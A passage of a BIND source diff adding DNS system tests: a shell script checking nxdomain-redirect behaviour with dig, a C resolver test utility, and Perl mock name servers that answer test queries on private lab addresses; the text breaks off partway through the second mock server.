$DIG $DIGOPTS +short @10.53.0.2 soa example.nil > dig.out.ns1.test$n || tmp=1 + set -- `cat dig.out.ns1.test$n` + [ $3 = 1 ] || tmp=1 + $DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.2 a > dig.out.ns2.test$n || tmp=1 + grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || tmp=1 + grep "100.100.100.2" dig.out.ns2.test$n > /dev/null || tmp=1 + [ $tmp -eq 0 ] && break + sleep 1 +done +[ $tmp -eq 1 ] && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A nxdomain-redirect works for nonexist ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.4 -b 10.53.0.2 a > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "nonexist. .*100.100.100.1" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA nxdomain-redirect works for nonexist ($n)" +ret=0 +rm ns4/named.stats 2>/dev/null +$RNDCCMD 10.53.0.4 stats || ret=1 +PRE_RED=`tr -d '\r' < ns4/named.stats | sed -n -e "s/[ ]*\([0-9]*\).queries resulted in NXDOMAIN that were redirected$/\1/p"` +PRE_SUC=`tr -d '\r' < ns4/named.stats | sed -n -e "s/[ ]*\([0-9]*\).queries resulted in NXDOMAIN that were redirected and resulted in a successful remote lookup$/\1/p"` +$DIG $DIGOPTS nonexist. @10.53.0.4 -b 10.53.0.2 aaaa > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "nonexist. .*2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA nxdomain-redirect updates statistics ($n)" +ret=0 +rm ns4/named.stats 2>/dev/null +$RNDCCMD 10.53.0.4 stats || ret=1 +POST_RED=`tr -d '\r' < ns4/named.stats | sed -n -e "s/[ ]*\([0-9]*\).queries resulted in NXDOMAIN that were redirected$/\1/p"` +POST_SUC=`tr -d '\r' < ns4/named.stats | sed -n -e "s/[ ]*\([0-9]*\).queries resulted in NXDOMAIN that were redirected and resulted in a successful remote lookup$/\1/p"` +if [ `expr $POST_RED - $PRE_RED` != 1 ]; then ret=1; fi +if [ `expr $POST_SUC - $PRE_SUC` != 1 ]; then ret=1; fi +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY nxdomain-redirect works for nonexist ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.4 -b 10.53.0.2 any > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A nxdomain-redirect works for signed nonexist, DO=0 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.4 -b 10.53.0.2 a > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA nxdomain-redirect works for signed nonexist, DO=0 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.4 -b 10.53.0.2 aaaa > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY nxdomain-redirect works for signed nonexist, DO=0 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.4 -b 10.53.0.2 any > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A nxdomain-redirect fails for signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.4 -b 10.53.0.2 a > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA nxdomain-redirect fails for signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.4 -b 10.53.0.2 aaaa > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY nxdomain-redirect fails for signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.4 -b 10.53.0.2 any > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A nxdomain-redirect fails for nsec3 signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.4 -b 10.53.0.2 a > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA nxdomain-redirect fails for nsec3 signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.4 -b 10.53.0.2 aaaa > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY nxdomain-redirect fails for nsec3 signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.4 -b 10.53.0.2 any > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking nxdomain-redirect works (with noerror) when qtype is not found ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.4 -b 10.53.0.2 txt > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking nxdomain-redirect against authoritative zone ($n)" +ret=0 +$DIG $DIGOPTS nonexist.example @10.53.0.4 -b 10.53.0.2 a > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking tld nxdomain-redirect against signed root zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.5 asdfasdfasdf > dig.out.ns5.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns5.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking tld nxdomain-redirect against unsigned root zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.6 asdfasdfasdf > dig.out.ns6.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns6.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/resolve.c b/bin/tests/system/resolve.c new file mode 100644 index 0000000..8915773 --- /dev/null +++ b/bin/tests/system/resolve.c @@ -0,0 +1,501 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#ifndef WIN32 +#include <arpa/inet.h> +#include <netdb.h> +#include <netinet/in.h> +#include <sys/socket.h> +#include <sys/types.h> +#include <unistd.h> +#endif /* ifndef WIN32 */ + +#include <stdbool.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> + +#include <isc/app.h> +#include <isc/base64.h> +#include <isc/buffer.h> +#include <isc/commandline.h> +#include <isc/lib.h> +#include <isc/managers.h> +#include <isc/mem.h> +#include <isc/print.h> +#include <isc/sockaddr.h> +#include <isc/socket.h> +#include <isc/task.h> +#include <isc/timer.h> +#include <isc/util.h> + +#include <dns/client.h> +#include <dns/fixedname.h> +#include <dns/keyvalues.h> +#include <dns/lib.h> +#include <dns/name.h> +#include <dns/rdata.h> +#include <dns/rdataset.h> +#include <dns/rdatastruct.h> +#include <dns/rdatatype.h> +#include <dns/result.h> +#include <dns/secalg.h> + +#include <dst/dst.h> + +#include <irs/resconf.h> + +static char *algname; + +static isc_result_t +printdata(dns_rdataset_t *rdataset, dns_name_t *owner) { + isc_buffer_t target; + isc_result_t result; + isc_region_t r; + char t[4096]; + + if (!dns_rdataset_isassociated(rdataset)) { + printf("[WARN: empty]\n"); + return (ISC_R_SUCCESS); + } + + isc_buffer_init(&target, t, sizeof(t)); + + result = dns_rdataset_totext(rdataset, owner, false, false, &target); + if (result != ISC_R_SUCCESS) { + return (result); + } + isc_buffer_usedregion(&target, &r); + printf("%.*s", (int)r.length, (char *)r.base); + + return (ISC_R_SUCCESS); +} + +ISC_PLATFORM_NORETURN_PRE static void +usage(void) ISC_PLATFORM_NORETURN_POST; + +static void +usage(void) { + fprintf(stderr, "resolve [-t RRtype] " + "[[-a algorithm] [-e] -k keyname -K keystring] " + "[-S domain:serveraddr_for_domain ] [-s server_address]" + "[-b address[#port]] hostname\n"); + + exit(1); +} + +static void +set_key(dns_client_t *client, char *keynamestr, char *keystr, bool is_sep, + isc_mem_t **mctxp) { + isc_result_t result; + dns_fixedname_t fkeyname; + unsigned int namelen; + dns_name_t *keyname; + dns_rdata_dnskey_t keystruct; + unsigned char keydata[4096]; + isc_buffer_t keydatabuf; + unsigned char rrdata[4096]; + isc_buffer_t rrdatabuf; + isc_buffer_t b; + isc_textregion_t tr; + isc_region_t r; + dns_secalg_t alg; + + isc_mem_create(mctxp); + + if (algname != NULL) { + tr.base = algname; + tr.length = strlen(algname); + result = dns_secalg_fromtext(&alg, &tr); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "failed to identify the algorithm\n"); + exit(1); + } + } else { + alg = DNS_KEYALG_RSASHA1; + } + + keystruct.common.rdclass = dns_rdataclass_in; + keystruct.common.rdtype = dns_rdatatype_dnskey; + keystruct.flags = DNS_KEYOWNER_ZONE; /* fixed */ + if (is_sep) { + keystruct.flags |= DNS_KEYFLAG_KSK; + } + keystruct.protocol = DNS_KEYPROTO_DNSSEC; /* fixed */ + keystruct.algorithm = alg; + + isc_buffer_init(&keydatabuf, keydata, sizeof(keydata)); + isc_buffer_init(&rrdatabuf, rrdata, sizeof(rrdata)); + result = isc_base64_decodestring(keystr, &keydatabuf); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "base64 decode failed\n"); + exit(1); + } + isc_buffer_usedregion(&keydatabuf, &r); + keystruct.datalen = r.length; + keystruct.data = r.base; + + result = dns_rdata_fromstruct(NULL, keystruct.common.rdclass, + keystruct.common.rdtype, &keystruct, + &rrdatabuf); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "failed to construct key rdata\n"); + exit(1); + } + namelen = strlen(keynamestr); + isc_buffer_init(&b, keynamestr, namelen); + isc_buffer_add(&b, namelen); + keyname = dns_fixedname_initname(&fkeyname); + result = dns_name_fromtext(keyname, &b, dns_rootname, 0, NULL); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "failed to construct key name\n"); + exit(1); + } + result = dns_client_addtrustedkey(client, dns_rdataclass_in, + dns_rdatatype_dnskey, keyname, + &rrdatabuf); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "failed to add key for %s\n", keynamestr); + exit(1); + } +} + +static void +addserver(dns_client_t *client, const char *addrstr, const char *port, + const char *name_space) { + struct addrinfo hints, *res; + int gaierror; + isc_sockaddr_t sa; + isc_sockaddrlist_t servers; + isc_result_t result; + unsigned int namelen; + isc_buffer_t b; + dns_fixedname_t fname; + dns_name_t *name = NULL; + + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_DGRAM; + hints.ai_protocol = IPPROTO_UDP; + hints.ai_flags = AI_NUMERICHOST; + gaierror = getaddrinfo(addrstr, port, &hints, &res); + if (gaierror != 0) { + fprintf(stderr, "getaddrinfo failed: %s\n", + gai_strerror(gaierror)); + exit(1); + } + INSIST(res->ai_addrlen <= sizeof(sa.type)); + memmove(&sa.type, res->ai_addr, res->ai_addrlen); + sa.length = (unsigned int)res->ai_addrlen; + freeaddrinfo(res); + ISC_LINK_INIT(&sa, link); + ISC_LIST_INIT(servers); + ISC_LIST_APPEND(servers, &sa, link); + + if (name_space != NULL) { + namelen = strlen(name_space); + isc_buffer_constinit(&b, name_space, namelen); + isc_buffer_add(&b, namelen); + name = dns_fixedname_initname(&fname); + result = dns_name_fromtext(name, &b, dns_rootname, 0, NULL); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "failed to convert qname: %u\n", + result); + exit(1); + } + } + + result = dns_client_setservers(client, dns_rdataclass_in, name, + &servers); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "set server failed: %u\n", result); + exit(1); + } +} + +int +main(int argc, char *argv[]) { + int ch; + isc_textregion_t tr; + char *server = NULL; + char *altserver = NULL; + char *altserveraddr = NULL; + char *altservername = NULL; + dns_client_t *client = NULL; + char *keynamestr = NULL; + char *keystr = NULL; + isc_result_t result; + isc_buffer_t b; + dns_fixedname_t qname0; + unsigned int namelen; + dns_name_t *qname, *name; + dns_rdatatype_t type = dns_rdatatype_a; + dns_rdataset_t *rdataset; + dns_namelist_t namelist; + isc_mem_t *keymctx = NULL; + unsigned int clientopt, resopt = 0; + bool is_sep = false; + const char *port = "53"; + isc_mem_t *mctx = NULL; + isc_appctx_t *actx = NULL; + isc_nm_t *netmgr = NULL; + isc_taskmgr_t *taskmgr = NULL; + isc_socketmgr_t *socketmgr = NULL; + isc_timermgr_t *timermgr = NULL; + struct in_addr in4; + struct in6_addr in6; + isc_sockaddr_t a4, a6; + isc_sockaddr_t *addr4 = NULL, *addr6 = NULL; + + while ((ch = isc_commandline_parse(argc, argv, "a:b:es:t:k:K:p:S:")) != + -1) + { + switch (ch) { + case 't': + tr.base = isc_commandline_argument; + tr.length = strlen(isc_commandline_argument); + result = dns_rdatatype_fromtext(&type, &tr); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "invalid RRtype: %s\n", + isc_commandline_argument); + exit(1); + } + break; + case 'a': + algname = isc_commandline_argument; + break; + case 'b': + if (inet_pton(AF_INET, isc_commandline_argument, + &in4) == 1) + { + if (addr4 != NULL) { + fprintf(stderr, "only one local " + "address per family " + "can be specified\n"); + exit(1); + } + isc_sockaddr_fromin(&a4, &in4, 0); + addr4 = &a4; + } else if (inet_pton(AF_INET6, isc_commandline_argument, + &in6) == 1) + { + if (addr6 != NULL) { + fprintf(stderr, "only one local " + "address per family " + "can be specified\n"); + exit(1); + } + isc_sockaddr_fromin6(&a6, &in6, 0); + addr6 = &a6; + } else { + fprintf(stderr, "invalid address %s\n", + isc_commandline_argument); + exit(1); + } + break; + case 'e': + is_sep = true; + break; + case 'S': + if (altserver != NULL) { + fprintf(stderr, + "alternate server " + "already defined: %s\n", + altserver); + exit(1); + } + altserver = isc_commandline_argument; + break; + case 's': + if (server != NULL) { + fprintf(stderr, + "server " + "already defined: %s\n", + server); + exit(1); + } + server = isc_commandline_argument; + break; + case 'k': + keynamestr = isc_commandline_argument; + break; + case 'K': + keystr = isc_commandline_argument; + break; + case 'p': + port = isc_commandline_argument; + break; + default: + usage(); + } + } + + argc -= isc_commandline_index; + argv += isc_commandline_index; + if (argc < 1) { + usage(); + } + + if (altserver != NULL) { + char *cp; + + cp = strchr(altserver, ':'); + if (cp == NULL) { + fprintf(stderr, "invalid alternate server: %s\n", + altserver); + exit(1); + } + *cp = '\0'; + altservername = altserver; + altserveraddr = cp + 1; + } + + isc_lib_register(); + result = dns_lib_init(); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "dns_lib_init failed: %u\n", result); + exit(1); + } + + isc_mem_create(&mctx); + + result = isc_appctx_create(mctx, &actx); + if (result != ISC_R_SUCCESS) { + goto cleanup; + } + result = isc_app_ctxstart(actx); + if (result != ISC_R_SUCCESS) { + goto cleanup; + } + result = isc_managers_create(mctx, 1, 0, &netmgr, &taskmgr); + if (result != ISC_R_SUCCESS) { + goto cleanup; + } + result = isc_socketmgr_create(mctx, &socketmgr); + if (result != ISC_R_SUCCESS) { + goto cleanup; + } + result = isc_timermgr_create(mctx, &timermgr); + if (result != ISC_R_SUCCESS) { + goto cleanup; + } + + clientopt = 0; + result = dns_client_create(mctx, actx, taskmgr, socketmgr, timermgr, + clientopt, &client, addr4, addr6); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "dns_client_create failed: %u, %s\n", result, + isc_result_totext(result)); + exit(1); + } + + /* Set the nameserver */ + if (server == NULL) { + irs_resconf_t *resconf = NULL; + isc_sockaddrlist_t *nameservers; + + result = irs_resconf_load(mctx, "/etc/resolv.conf", &resconf); + if (result != ISC_R_SUCCESS && result != ISC_R_FILENOTFOUND) { + fprintf(stderr, "irs_resconf_load failed: %u\n", + result); + exit(1); + } + nameservers = irs_resconf_getnameservers(resconf); + result = dns_client_setservers(client, dns_rdataclass_in, NULL, + nameservers); + if (result != ISC_R_SUCCESS) { + irs_resconf_destroy(&resconf); + fprintf(stderr, "dns_client_setservers failed: %u\n", + result); + exit(1); + } + irs_resconf_destroy(&resconf); + } else { + addserver(client, server, port, NULL); + } + + /* Set the alternate nameserver (when specified) */ + if (altserver != NULL) { + addserver(client, altserveraddr, port, altservername); + } + + /* Install DNSSEC key (if given) */ + if (keynamestr != NULL) { + if (keystr == NULL) { + fprintf(stderr, "key string is missing " + "while key name is provided\n"); + exit(1); + } + set_key(client, keynamestr, keystr, is_sep, &keymctx); + } + + /* Construct qname */ + namelen = strlen(argv[0]); + isc_buffer_init(&b, argv[0], namelen); + isc_buffer_add(&b, namelen); + qname = dns_fixedname_initname(&qname0); + result = dns_name_fromtext(qname, &b, dns_rootname, 0, NULL); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "failed to convert qname: %u\n", result); + } + + /* Perform resolution */ + if (keynamestr == NULL) { + resopt |= DNS_CLIENTRESOPT_NODNSSEC; + } + ISC_LIST_INIT(namelist); + result = dns_client_resolve(client, qname, dns_rdataclass_in, type, + resopt, &namelist); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "resolution failed: %s\n", + dns_result_totext(result)); + } + for (name = ISC_LIST_HEAD(namelist); name != NULL; + name = ISC_LIST_NEXT(name, link)) + { + for (rdataset = ISC_LIST_HEAD(name->list); rdataset != NULL; + rdataset = ISC_LIST_NEXT(rdataset, link)) + { + if (printdata(rdataset, name) != ISC_R_SUCCESS) { + fprintf(stderr, "print data failed\n"); + } + } + } + + dns_client_freeresanswer(client, &namelist); + + /* Cleanup */ +cleanup: + dns_client_destroy(&client); + + if (taskmgr != NULL) { + isc_managers_destroy(&netmgr, &taskmgr); + } + if (timermgr != NULL) { + isc_timermgr_destroy(&timermgr); + } + if (socketmgr != NULL) { + isc_socketmgr_destroy(&socketmgr); + } + if (actx != NULL) { + isc_appctx_destroy(&actx); + } + isc_mem_detach(&mctx); + + if (keynamestr != NULL) { + isc_mem_destroy(&keymctx); + } + dns_lib_shutdown(); + + return (0); +} diff --git a/bin/tests/system/resolver/ans2/ans.pl b/bin/tests/system/resolver/ans2/ans.pl new file mode 100644 index 0000000..7876508 --- /dev/null +++ b/bin/tests/system/resolver/ans2/ans.pl @@ -0,0 +1,140 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Ad hoc name server +# + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.2", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +for (;;) { + $sock->recv($buf, 512); + + print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n"; + + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + if ($qname eq "com" && $qtype eq "NS") { + $packet->header->aa(1); + $packet->push("answer", new Net::DNS::RR("com 300 NS a.root-servers.nil.")); + } elsif ($qname eq "example.com" && $qtype eq "NS") { + $packet->header->aa(1); + $packet->push("answer", new Net::DNS::RR("example.com 300 NS a.root-servers.nil.")); + } elsif ($qname eq "cname1.example.com") { + # Data for the "cname + other data / 1" test + $packet->push("answer", new Net::DNS::RR("cname1.example.com 300 CNAME cname1.example.com")); + $packet->push("answer", new Net::DNS::RR("cname1.example.com 300 A 1.2.3.4")); + } elsif ($qname eq "cname2.example.com") { + # Data for the "cname + other data / 2" test: same RRs in opposite order + $packet->push("answer", new Net::DNS::RR("cname2.example.com 300 A 1.2.3.4")); + $packet->push("answer", new Net::DNS::RR("cname2.example.com 300 CNAME cname2.example.com")); + } elsif ($qname =~ /redirect\.com/) { + $packet->push("authority", new Net::DNS::RR("redirect.com 300 NS ns.redirect.com")); + $packet->push("additional", new Net::DNS::RR("ns.redirect.com 300 A 10.53.0.6")); + } elsif ($qname =~ /\.tld1/) { + $packet->push("authority", new Net::DNS::RR("tld1 300 NS ns.tld1")); + $packet->push("additional", new Net::DNS::RR("ns.tld1 300 A 10.53.0.6")); + } elsif ($qname =~ /\.tld2/) { + $packet->push("authority", new Net::DNS::RR("tld2 300 NS ns.tld2")); + $packet->push("additional", new Net::DNS::RR("ns.tld2 300 A 10.53.0.7")); + } elsif ($qname eq "org" && $qtype eq "NS") { + $packet->header->aa(1); + $packet->push("answer", new Net::DNS::RR("org 300 NS a.root-servers.nil.")); + } elsif ($qname eq "example.org" && $qtype eq "NS") { + $packet->header->aa(1); + $packet->push("answer", new Net::DNS::RR("example.org 300 NS a.root-servers.nil.")); + } elsif (($qname eq "baddname.example.org" || $qname eq "gooddname.example.org") && $qtype eq "NS") { + $packet->header->aa(1); + $packet->push("answer", new Net::DNS::RR("example.org 300 NS a.root-servers.nil.")); + } elsif ($qname eq "www.example.org" || + $qname eq "badcname.example.org" || + $qname eq "goodcname.example.org" || + $qname eq "foo.baddname.example.org" || + $qname eq "foo.gooddname.example.org") { + # Data for address/alias filtering. + $packet->header->aa(1); + if ($qtype eq "A") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 A 192.0.2.1")); + } elsif ($qtype eq "AAAA") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 AAAA 2001:db8:beef::1")); + } + } elsif ($qname eq "net" && $qtype eq "NS") { + $packet->header->aa(1); + $packet->push("answer", new Net::DNS::RR("net 300 NS a.root-servers.nil.")); + } elsif ($qname =~ /example\.net/) { + $packet->push("authority", new Net::DNS::RR("example.net 300 NS ns.example.net")); + $packet->push("additional", new Net::DNS::RR("ns.example.net 300 A 10.53.0.3")); + } elsif ($qname =~ /sub\.example\.org/) { + # Data for CNAME/DNAME filtering. The final answers are + # expected to be accepted regardless of the filter setting. + $packet->push("authority", new Net::DNS::RR("sub.example.org 300 NS ns.sub.example.org")); + $packet->push("additional", new Net::DNS::RR("ns.sub.example.org 300 A 10.53.0.3")); + } elsif ($qname =~ /glue-in-answer\.example\.org/) { + $packet->push("answer", new Net::DNS::RR("ns.glue-in-answer.example.org 300 A 10.53.0.3")); + $packet->push("authority", new Net::DNS::RR("glue-in-answer.example.org 300 NS ns.glue-in-answer.example.org")); + $packet->push("additional", new Net::DNS::RR("ns.glue-in-answer.example.org 300 A 10.53.0.3")); + } elsif ($qname =~ /\.broken/ || $qname =~ /^broken/) { + # Delegation to broken TLD. + $packet->push("authority", new Net::DNS::RR("broken 300 NS ns.broken")); + $packet->push("additional", new Net::DNS::RR("ns.broken 300 A 10.53.0.4")); + } else { + # Data for the "bogus referrals" test + $packet->push("authority", new Net::DNS::RR("below.www.example.com 300 NS ns.below.www.example.com")); + $packet->push("additional", new Net::DNS::RR("ns.below.www.example.com 300 A 10.53.0.3")); + } + + $sock->send($packet->data); + + print "RESPONSE:\n"; + $packet->print; + print "\n"; +} diff --git a/bin/tests/system/resolver/ans3/ans.pl b/bin/tests/system/resolver/ans3/ans.pl new file mode 100644 index 0000000..d4d7ae7 --- /dev/null +++ b/bin/tests/system/resolver/ans3/ans.pl @@ -0,0 +1,183 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Ad hoc name server +# + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $server_addr = "10.53.0.3"; + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; +my $tcpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +sub handleQuery { + my $buf = shift; + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + $packet->header->aa(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + if ($qname eq "example.net" && $qtype eq "NS") { + $packet->push("answer", new Net::DNS::RR($qname . " 300 NS ns.example.net")); + $packet->push("additional", new 